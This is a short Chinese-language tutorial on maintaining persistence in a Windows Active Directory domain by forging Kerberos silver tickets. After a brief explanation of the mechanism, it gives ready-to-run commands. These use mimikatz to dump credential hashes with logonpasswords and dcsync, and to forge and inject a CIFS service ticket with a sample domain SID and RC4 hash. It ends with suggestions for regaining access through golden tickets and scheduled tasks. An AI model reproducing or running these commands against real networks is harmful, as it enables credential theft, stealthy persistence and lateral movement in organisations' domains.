白银票据权限维持

白银票据权限维持

目录

• 白银票据权限维持
  • 一、服务账号介绍
  • 二、白银票据原理
  • 三、实验前提
  • 四、实验步骤

一、服务账号介绍

服务账号就是计算机名字+$用来管理服务的账号

二、白银票据原理

如果说黄金票据是伪造的TGT，那么白银票据就是伪造的ST。 在Kerberos认证的第5步，Client带着ST和Authenticator3向Server上的某个服务进行请求，Server接收到Client的请求之后，通过自己的Master Key 解密ST，从而获得 Session Key。通过 Session Key 解密 Authenticator3，进而验证对方的身份，验证成功就让 Client 访问 server上的指定服务了。所以我们只需要知道Server用户的Hash就可以伪造出一个ST，且不会经过KDC，但是伪造的门票只对部分服务起作用。

三、实验前提

已经控制了域名并且使用域管理员登录或者提权的system。

条件如下：

1.域名
2.域sid
3.目标服务器名
4.可利用的服务
5.服务账号的NTML哈希
6.需要伪造的用户名（这个可以随意）

四、实验步骤

1、获取关键信息

shell whoami /user 获取域名和SID
shell net config workstation 获取完整域名
shell wmic useraccount list brief 获取域名和SID
shell net time /domain 获取域主机名

2、获取服务账号的NTLM哈希值

mimikatz sekurlsa::logonpasswords

mimikatz lsadump::dcsync /domain:candada.com /user:DC$(主机名$)

3、伪造票据

mimikatz kerberos::tgt 查票
mimikatz kerberos::purge 清票
shell klist 查票
shell klist purge 清票
mimikatz kerberos::golden /domain:candada.com /sid:S-1-5-21-3368079911-2200516951-1212899923 /target:DC.candada.com /service:cifs /rc4:3a67aaaf095a99cbebd4e8d91d1ba46f /user:test /ptt

4、利用思路：

（1）可以利用ldap服务去获取krbtgt的NTLM哈希，利用黄金票据+计划任务上线

（2）可以利用cifs服务+host服务+计划任务上线